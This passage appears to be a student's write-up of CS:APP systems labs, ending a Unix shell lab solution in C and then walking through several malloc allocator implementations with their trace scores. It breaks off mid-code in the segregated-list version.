    }
    if (!strcmp(argv[0], "kill")) {
        do_kill(argv);
        return 1;
    }
    if (!strcmp(argv[0], "bg")) {
        do_bgfg(argv);
        return 1;
    }
    if (!strcmp(argv[0], "&")) {
        return 1;
    }
    return 0;     /* not a builtin command */
}

void do_kill(char **argv)
{
    pid_t pid = 0;
    if (argv[1][0] == '%') {
        int jid = atoi(argv[1] + 1);
        pid = jid2pid(jid);
    }
    else {
        pid = atoi(argv[1]);
    }
    
    kill (-pid, SIGKILL);
}

/* 
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char **argv) 
{
    if (argv[1] == NULL) {
        if (!strcmp(argv[0], "fg")) {
            printf("fg command requires PID or %%jobid argument\n");
        }
        else {
            printf("bg command requires PID or %%jobid argument\n");
        }
        return;
    }

    pid_t pid = 0;
    if (argv[1][0] == '%') {
        int jid = atoi(argv[1] + 1);
        if (jid == 0) {
            if (!strcmp(argv[0], "fg")) {
                printf("fg: argument must be a PID or %%jobid\n");
            }
            else{
                printf("bg: argument must be a PID or %%jobid\n");
            }
            return;
        }
        
        pid = jid2pid(jid);
        if (pid == 0) {
            printf("%%%d: No such job\n", jid);
            return;
        }
    }
    else {
        pid = atoi(argv[1]);
        if (pid == 0) {
            if (!strcmp(argv[0], "fg")) {
                printf("fg: argument must be a PID or %%jobid\n");
            }
            else{
                printf("bg: argument must be a PID or %%jobid\n");
            }
            return;
        }
    }

    kill (-pid, SIGCONT);
    struct job_t* job = getjobpid (jobs, pid);
    if (job == NULL) {
        printf("(%d): No such process\n", pid);
        return;
    }

    if (!strcmp(argv[0], "fg")) {
        job->state = FG;
        waitfg(pid);
    }
    else {
        job->state = BG;
        list_cont_bgjob (job);
    }
}

/* 
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    sigset_t mask;
    sigemptyset (&mask);

    fg_pid = pid; 
    fg_state = 0; 
    while (!fg_state) {
        //sleep(1);
        sigsuspend (&mask);
    }
}

/*****************
 * Signal handlers
 *****************/

/* 
 * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
 *     a child job terminates (becomes a zombie), or stops because it
 *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
 *     available zombie children, but doesn't wait for any other
 *     currently running children to terminate.  
 */
void sigchld_handler(int sig) 
{
    fflush(stdout);
    int old_errno = errno;
    sigset_t mask_all, prev;
    pid_t pid;
    int status;

    sigfillset (&mask_all);
    while ((pid = waitpid (-1, &status, WNOHANG | WUNTRACED)) > 0) {
        sigprocmask (SIG_BLOCK, &mask_all, &prev);
        if (pid == fg_pid) {
            fg_state = pid;
        }
        // Child process is stopped
        if (WIFSTOPPED(status)) {
            struct job_t* job = getjobpid (jobs, pid);
            job->state = ST;
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, pid, WSTOPSIG(status));

        }
        // Child process is terminated
        else if (WIFSIGNALED(status)) {
            struct job_t* job = getjobpid (jobs, pid);
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, pid, WTERMSIG(status));
            deletejob(jobs, pid);
        }
        // Child process exits normally
        else {
            deletejob(jobs, pid);
        }
        sigprocmask (SIG_SETMASK, &prev, NULL);
    }
    errno = old_errno;
}

/* 
 * sigint_handler - The kernel sends a SIGINT to the shell whenver the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.  
 */
void sigint_handler(int sig) 
{
    int old_errno = errno;
    sigset_t mask_all, prev;

    sigfillset (&mask_all);
    sigprocmask (SIG_BLOCK, &mask_all, &prev);
    if (!fg_state) {
        kill (-fg_pid, SIGINT);
        list_terminated_fgjob (getjobpid(jobs, fg_pid));
        deletejob (jobs, fg_pid);
        fg_state = 1;
    }
    sigprocmask (SIG_SETMASK, &prev, NULL);

    errno = old_errno;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.  
 */
void sigtstp_handler(int sig) 
{
    int old_errno = errno;
    sigset_t mask_all, prev;
    sigfillset (&mask_all);
    sigprocmask (SIG_BLOCK, &mask_all, &prev);
    if (!fg_state) {
        kill (-fg_pid, SIGTSTP);
        struct job_t* job = getjobpid (jobs, fg_pid);
        job->state = ST;
        list_stopped_fgjob (job);
        fg_state = 1;
    }
    sigprocmask (SIG_SETMASK, &prev, NULL);

    errno = old_errno;
}

/*********************
 * End signal handlers
 *********************/

/***********************************************
 * Helper routines that manipulate the job list
 **********************************************/

/* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t *job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
	clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t *jobs) 
{
    int i, max=0;

    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].jid > max)
	    max = jobs[i].jid;
    return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline) 
{
    int i;
    
    if (pid < 1)
	return 0;

    for (i = 0; i < MAXJOBS; i++) {
	if (jobs[i].pid == 0) {
	    jobs[i].pid = pid;
	    jobs[i].state = state;
	    jobs[i].jid = nextjid++;
	    if (nextjid > MAXJOBS)
		nextjid = 1;
	    strcpy(jobs[i].cmdline, cmdline);
  	    if(verbose){
	        printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
            }
            return 1;
	}
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t *jobs, pid_t pid) 
{
    int i;

    if (pid < 1)
	return 0;

    for (i = 0; i < MAXJOBS; i++) {
	if (jobs[i].pid == pid) {
	    clearjob(&jobs[i]);
	    nextjid = maxjid(jobs)+1;
	    return 1;
	}
    }
    return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].state == FG)
	    return jobs[i].pid;
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t *getjobpid(struct job_t *jobs, pid_t pid) {
    int i;

    if (pid < 1)
	return NULL;
    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].pid == pid)
	    return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t *getjobjid(struct job_t *jobs, int jid) 
{
    int i;

    if (jid < 1)
	return NULL;
    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].jid == jid)
	    return &jobs[i];
    return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid) 
{
    int i;

    if (pid < 1)
	return 0;
    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].pid == pid) {
            return jobs[i].jid;
        }
    return 0;
}

pid_t jid2pid(int jid)
{
    int i;
    if (jid < 1)
        return 0;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid) {
            return jobs[i].pid;
        }
    return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t *jobs) 
{
    int i;
    
    for (i = 0; i < MAXJOBS; i++) {
	if (jobs[i].pid != 0) {
	    printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
	    switch (jobs[i].state) {
		case BG: 
		    printf("Running ");
		    break;
		case FG: 
		    printf("Foreground ");
		    break;
		case ST: 
		    printf("Stopped ");
		    break;
	    default:
		    printf("listjobs: Internal error: job[%d].state=%d ", 
			   i, jobs[i].state);
	    }
	    printf("%s", jobs[i].cmdline);
	}
    }
}

void list_cont_bgjob(struct job_t* job)
{
    printf("[%d] (%d) ", job->jid, job->pid);
    printf("%s", job->cmdline);
}

void list_terminated_fgjob(struct job_t* job)
{
    printf("Job [%d] (%d) terminated by signal 2\n", job->jid, job->pid);
}

void list_stopped_fgjob(struct job_t* job)
{
    printf("Job [%d] (%d) stopped by signal 20\n", job->jid, job->pid); 
}

/******************************
 * end job list helper routines
 ******************************/


/***********************
 * Other helper routines
 ***********************/

/*
 * usage - print a help message
 */
void usage(void) 
{
    printf("Usage: shell [-hvp]\n");
    printf("   -h   print this message\n");
    printf("   -v   print additional diagnostic information\n");
    printf("   -p   do not emit a command prompt\n");
    exit(1);
}

/*
 * unix_error - unix-style error routine
 */
void unix_error(char *msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

/*
 * app_error - application-style error routine
 */
void app_error(char *msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

/*
 * Signal - wrapper for the sigaction function
 */
handler_t *Signal(int signum, handler_t *handler) 
{
    struct sigaction action, old_action;

    action.sa_handler = handler;  
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
	unix_error("Signal error");
    return (old_action.sa_handler);
}

/*
 * sigquit_handler - The driver program can gracefully terminate the
 *    child shell by sending it a SIGQUIT signal.
 */
void sigquit_handler(int sig) 
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

Lab 7: Malloc Lab

This lab needs us to implement your own allocator, which supports malloc, free and realloc. This lab might be the hardest one if you pursue a really high score.

Note that I used a relatively harder set of trace files here than the original set. Set your target at 95 scores and above if you'd like to challenge yourself. Oh, don't forget to add there trace files into your config.h:

#define DEFAULT_TRACEFILES \
    "amptjp-bal.rep",\
    "cccp-bal.rep",\
    "cp-decl-bal.rep",\
    "expr-bal.rep",\
    "coalescing-bal.rep",\
    "random-bal.rep",\
    "random2-bal.rep",\
    "binary-bal.rep",\
    "binary2-bal.rep",\
    "realloc-bal.rep",\
    "realloc2-bal.rep",\
    "boat.rep",\
    "boat-plus.rep", \
    "coalesce-big.rep",  \
    "exhaust.rep", \
    "seglist.rep"

Naive Implicit

As a baseline, we first implement the implicit linked list version from the textbook without any optimization. Here is the code:

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
    /* Team name */
    "Goodbye",
    /* First member's full name */
    "Sulley",
    /* First member's email address */
    "sulley@cs.cmu.edu",
    /* Second member's full name (leave blank if none) */
    "AnotherSulley",
    /* Second member's email address (leave blank if none) */
    "anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8
#define H_ALIGNMENT (ALIGNMENT/2)

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bit into a word */
#define PACK(size, alloc) ((size) | (alloc))

/* Read and write a double word at address p */
#define GET(p)      (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p)  (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp)  ((char *)(bp) - H_ALIGNMENT)
#define FTRP(bp)  ((char *)(bp) + GET_SIZE(HDRP(bp)) - ALIGNMENT)

/* Given block ptr bp, compute address of next and previous blocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - ALIGNMENT)))

static char* heap_listp;

static void* coalesce(void *bp)
{
    size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
    size_t size = GET_SIZE(HDRP(bp));

    if (prev_alloc && next_alloc) {
        return bp;
    }

    else if (prev_alloc && !next_alloc) {
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(HDRP(bp), PACK(size, 0));
        PUT(FTRP(bp), PACK(size, 0));
    }

    else if (!prev_alloc && next_alloc) {
        size += GET_SIZE(HDRP(PREV_BLKP(bp)));
        PUT(FTRP(bp), PACK(size, 0));
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        bp = PREV_BLKP(bp);
    }

    else {
        size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(FTRP(NEXT_BLKP(bp)));
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
        bp = PREV_BLKP(bp);
    }

    return bp;
}


static void* find_fit_first_hit(size_t asize)
{
    void* bp;

    for (bp = heap_listp; GET_SIZE(HDRP(bp)) > 0; bp = NEXT_BLKP(bp)) {
        if (!GET_ALLOC(HDRP(bp)) && (asize <= GET_SIZE(HDRP(bp)))) {
            return bp;
        }
    }

    return NULL;
}

static void* find_fit(size_t asize)
{
    return find_fit_first_hit(asize);
}

static void place(void* bp, size_t asize)
{
    size_t csize = GET_SIZE(HDRP(bp));

    if ((csize - asize) >= 2 * ALIGNMENT) {
        PUT(HDRP(bp), PACK(asize, 1));
        PUT(FTRP(bp), PACK(asize, 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(csize - asize, 0));
        PUT(FTRP(bp), PACK(csize - asize, 0));
    }
    else {
        PUT(HDRP(bp), PACK(csize, 1));
        PUT(FTRP(bp), PACK(csize, 1));
    }
}

static void* extend_heap(size_t words)
{
    char *bp;
    size_t size;

    size = (words % 2) ? (words + 1) * H_ALIGNMENT : words * H_ALIGNMENT;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;

    PUT(HDRP(bp), PACK(size, 0));
    PUT(FTRP(bp), PACK(size, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));

    return coalesce(bp);
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    if ((heap_listp = mem_sbrk(4 * H_ALIGNMENT)) == (void *)-1)
        return -1;
    PUT(heap_listp, 0);
    PUT(heap_listp + 1 * H_ALIGNMENT, PACK(ALIGNMENT, 1));
    PUT(heap_listp + 2 * H_ALIGNMENT, PACK(ALIGNMENT, 1));
    PUT(heap_listp + 3 * H_ALIGNMENT, PACK(0, 1));
    heap_listp += 2 * H_ALIGNMENT;

    if (extend_heap(CHUNKSIZE / H_ALIGNMENT) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void* mm_malloc(size_t size)
{
    size_t asize;
    size_t extendsize;
    char* bp;

    if (size == 0)
        return NULL;

    if (size <= ALIGNMENT)
        asize = 2 * ALIGNMENT;
    else
        asize = ALIGNMENT * ((size + ALIGNMENT + ALIGNMENT - 1) / ALIGNMENT);

    if ((bp = find_fit(asize)) != NULL) {
        place (bp, asize);
        return bp;
    }

    extendsize = MAX(asize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize / H_ALIGNMENT)) == NULL)
       return NULL; 
    place(bp, asize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *bp)
{
    size_t size = GET_SIZE(HDRP(bp));
    PUT(HDRP(bp), PACK(size, 0));
    PUT(FTRP(bp), PACK(size, 0));
    coalesce(bp);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */
void* mm_realloc(void* bp, size_t size)
{
    if (bp == NULL)
        return mm_malloc(size);

    if (size == 0) {
        mm_free(bp);
        return NULL;
    }

    size_t osize = GET_SIZE(HDRP(bp)) - ALIGNMENT;
    size_t asize = ALIGNMENT * ((size + ALIGNMENT - 1) / ALIGNMENT);

    if (osize >= asize + 2 * ALIGNMENT) {
        void* old_bp = bp;
        PUT(HDRP(bp), PACK(asize + ALIGNMENT, 1));
        PUT(FTRP(bp), PACK(asize + ALIGNMENT, 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(osize - asize, 0));
        PUT(FTRP(bp), PACK(osize - asize, 0));
        
        coalesce(bp);
        return old_bp;
    }
    else if (osize >= asize) {
        return bp;
    }
    else {
        void* new_bp = mm_malloc(size);
        if (new_bp == NULL)
            return NULL;

        memcpy(new_bp, bp, osize);
        mm_free(bp);
        return new_bp;
    }
}

The naive version gets a score of... 54. Too bad isn't it?

trace  valid  util     ops      secs  Kops
 0       yes   99%    5694  0.004138  1376
 1       yes   99%    5848  0.003870  1511
 2       yes   99%    6648  0.006039  1101
 3       yes  100%    5380  0.004667  1153
 4       yes   66%   14400  0.000043338028
 5       yes   91%    4800  0.004471  1073
 6       yes   92%    4800  0.004170  1151
 7       yes   55%   12000  0.062290   193
 8       yes   51%   24000  0.208311   115
 9       yes   27%   14401  0.027274   528
10       yes   30%   14401  0.000727 19817
11       yes   56%   57716  0.960618    60
12       yes   78%  100000  1.945745    51
13       yes   99%   20000  0.000753 26553
14       yes   71%  200400  0.107901  1857
15       yes   58%    6495  0.013861   469
Total          73%  496983  3.354877   148

Perf index = 44 (util) + 10 (thru) = 54/100

Implicit + Deferred Coalesce + No Footer

Our first trial to optimize the naive version is to add deferred coalesce and eliminate footers for allocated blocks.

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
    /* Team name */
    "Goodbye",
    /* First member's full name */
    "Sulley",
    /* First member's email address */
    "sulley@cs.cmu.edu",
    /* Second member's full name (leave blank if none) */
    "AnotherSulley",
    /* Second member's email address (leave blank if none) */
    "anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, alloc_prev, alloc) ((size) | (alloc_prev) | (alloc))

/* Read and write a double word at address p */
#define GET(p)      (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p)       (GET(p) & ~0x7)
#define GET_ALLOC(p)      (GET(p) & 0x1)
#define GET_ALLOC_PREV(p) (GET(p) & 0x2)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp)  ((char *)(bp) - SWORD)
#define FTRP(bp)  ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

static char* heap_listp;

static void* coalesce(void *bp)
{
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
    size_t size = GET_SIZE(HDRP(bp));

    if (prev_alloc && next_alloc) {
        return bp;
    }

    else if (prev_alloc && !next_alloc) {
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(HDRP(bp), PACK(size, 1 << 1, 0));
        PUT(FTRP(bp), PACK(size, 1 << 1, 0));
    }

    else if (!prev_alloc && next_alloc) {
        bp = PREV_BLKP(bp);
        size += GET_SIZE(HDRP(bp));
        PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
    }

    else {
        size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(HDRP(NEXT_BLKP(bp)));
        bp = PREV_BLKP(bp);
        PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
        PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
    }

    return bp;
}


static void* find_fit_first_hit_deferred(size_t asize)
{
    void* bp = heap_listp;
    void* next;
    
    while (GET_SIZE(HDRP(bp)) > 0) {
        if (!GET_ALLOC(HDRP(bp))) {
            if (asize <= GET_SIZE(HDRP(bp))) 
                return bp;
            next = NEXT_BLKP(bp);
            if (!GET_ALLOC(HDRP(next))) {
                bp = coalesce(next);
                continue;
            }
        }
        bp = NEXT_BLKP(bp);
    }

    return NULL;
}

static void* find_fit_better_hit_deferred(size_t asize)
{
    void* bp = heap_listp;
    void* best_bp = NULL;
    size_t best_size = 0;
    const size_t iteration = 100;

    while (GET_SIZE(HDRP(bp)) > 0) {
        if (!GET_ALLOC(HDRP(bp))) {
            if (!GET_ALLOC(HDRP(NEXT_BLKP(bp)))) {
                bp = coalesce(NEXT_BLKP(bp));
                continue;
            }
            if (asize <= GET_SIZE(HDRP(bp))) {
                best_bp = bp;
                best_size = GET_SIZE(HDRP(bp));
                break;
            }
        }
        bp = NEXT_BLKP(bp);
    }

    if (best_bp == NULL)
        return NULL;

    size_t i = 0;
    while (i < iteration && GET_SIZE(HDRP(bp)) > 0) {
        // Coalesce
        while (!GET_ALLOC(HDRP(NEXT_BLKP(bp)))) {
            bp = coalesce(NEXT_BLKP(bp));
            continue;
        }
        
        // Check if it's better
        ++i;
        if (!GET_ALLOC(HDRP(bp)) && asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
            best_bp = bp;
            best_size = GET_SIZE(HDRP(bp));
        }

        // Find next free block
        bp = NEXT_BLKP(bp);
        while (GET_ALLOC(HDRP(bp)) && GET_SIZE(HDRP(bp)) > 0)
            bp = NEXT_BLKP(bp);
    }

    return best_bp;
}

static void* find_fit(size_t asize)
{
    //void* bp = find_fit_first_hit_deferred(asize);
    void* bp = find_fit_better_hit_deferred(asize);
    return bp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
    bp = NEXT_BLKP(bp);
    PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}

static void place(void* bp, size_t asize)
{
    size_t csize = GET_SIZE(HDRP(bp));
    if (csize >= asize + 2 * DWORD) {
        PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(csize - asize, 1 << 1, 0));
        PUT(FTRP(bp), PACK(csize - asize, 1 << 1, 0));
    }
    else {
        PUT(HDRP(bp), PACK(csize, GET_ALLOC_PREV(HDRP(bp)), 1));
        set_nextblock_alloc_prev(bp, 1 << 1);
    }
}

static void* extend_heap(size_t words)
{
    char *bp;
    size_t size;

    size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_alloc, 0));
    PUT(FTRP(bp), PACK(size, prev_alloc, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 1));
    return coalesce(bp);
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
        return -1;
    PUT(heap_listp, 0);
    PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 1, 1));
    PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 1, 1));
    PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 1, 1));
    heap_listp += 2 * SWORD;

    if (extend_heap(CHUNKSIZE / SWORD) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void* mm_malloc(size_t size)
{
    size_t asize;
    size_t extendsize;
    char* bp;

    if (size == 0)
        return NULL;

    if (size <= 3 * SWORD)
        asize = 2 * DWORD;
    else
        asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);

    if ((bp = find_fit(asize)) != NULL) {
        place (bp, asize);
        return bp;
    }

    extendsize = MAX(asize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize / SWORD)) == NULL)
       return NULL; 
    place(bp, asize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *bp)
{
    size_t size = GET_SIZE(HDRP(bp));
    size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
    PUT(HDRP(bp), PACK(size, prev_alloc, 0));
    PUT(FTRP(bp), PACK(size, prev_alloc, 0));
    
    set_nextblock_alloc_prev(bp, 0);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */
void* mm_realloc(void* bp, size_t size)
{
    if (bp == NULL)
        return mm_malloc(size);

    if (size == 0) {
        mm_free(bp);
        return NULL;
    }

    size_t osize = GET_SIZE(HDRP(bp));
    size_t asize = size <= 3 * SWORD ? 2 * DWORD : DWORD * ((size + SWORD + DWORD - 1) / DWORD);

    if (osize >= asize + 2 * DWORD) {
        void* old_bp = bp;
        PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
        bp = NEXT_BLKP(bp);
        PUT(HDRP(bp), PACK(osize - asize, 1 << 1, 0));
        PUT(FTRP(bp), PACK(osize - asize, 1 << 1, 0));
        set_nextblock_alloc_prev(bp, 0);
        return old_bp;
    }
    else if (osize >= asize) {
        return bp;
    }
    else {
        void* new_bp = mm_malloc(size);
        if (new_bp == NULL)
            return NULL;
        
        memcpy(new_bp, bp, osize - SWORD);
        mm_free(bp);
        return new_bp;
    }
}

Utility seems to be marginally better but the throughput is terribly bad. We must turn to some more efficient allocating data structures.

trace  valid  util     ops      secs  Kops
 0       yes   99%    5694  0.004449  1280
 1       yes   99%    5848  0.004395  1331
 2       yes   99%    6648  0.007329   907
 3       yes  100%    5380  0.005301  1015
 4       yes   66%   14400  0.000058249567
 5       yes   95%    4800  0.005649   850
 6       yes   94%    4800  0.005361   895
 7       yes   55%   12000  0.056433   213
 8       yes   51%   24000  0.181652   132
 9       yes   31%   14401  0.026830   537
10       yes   30%   14401  0.000816 17655
11       yes   77%   57716  0.965589    60
12       yes   78%  100000  1.950844    51
13       yes   99%   20000  0.000813 24585
14       yes   71%  200400  0.104944  1910
15       yes   58%    6495  0.014209   457
Total          75%  496983  3.334673   149

Perf index = 45 (util) + 10 (thru) = 55/100

Explicit + Deferred Coalesce + Better Hit

We then replace the implicit linked list with an explicit linked list, also with deferred coalesce and a better hit strategy to find a free block. Better hit means that when the first valid free block is hit, we then search the next free blocks and select the smallest valid free block. is set to by default.

The final score is 69 for this version. A significant improvement, but still not enough.

Seglist + Deferred Coalesce + Better Hit

To further improve utility and throughput, we must employ the segregate linked list. The lists are partitioned according to their sizes: . Deferred coalesce and better hit are still used.

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
    /* Team name */
    "Goodbye",
    /* First member's full name */
    "Sulley",
    /* First member's email address */
    "sulley@cs.cmu.edu",
    /* Second member's full name (leave blank if none) */
    "AnotherSulley",
    /* Second member's email address (leave blank if none) */
    "anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, alloc_prev, alloc) ((size) | (alloc_prev) | (alloc))

/* Read and write a double word at address p */
#define GET(p)      (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p)       (GET(p) & ~0x7)
#define GET_ALLOC(p)      (GET(p) & 0x1)
#define GET_ALLOC_PREV(p) (GET(p) & 0x2)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp)  ((char *)(bp) - SWORD)
#define FTRP(bp)  ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Get and set a free block's next/prev pointer value */
#define GET_PRVP(bp)     (*((unsigned int*)(bp) + 1))
#define GET_NXTP(bp)     (*(unsigned int*)(bp))
#define PUT_PRVP(bp, v)  (*((unsigned int*)(bp) + 1) = (v))
#define PUT_NXTP(bp, v)  (*(unsigned int*)(bp) = (v))


/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

#define N_SEGLIST 20

const unsigned int lower_seg[N_SEGLIST] = { 0, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22 };
const unsigned int upper_seg[N_SEGLIST] = { 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22, 1 << 32 - 1 };
static char* head_seglp[N_SEGLIST];
static char* heap_listp = NULL;

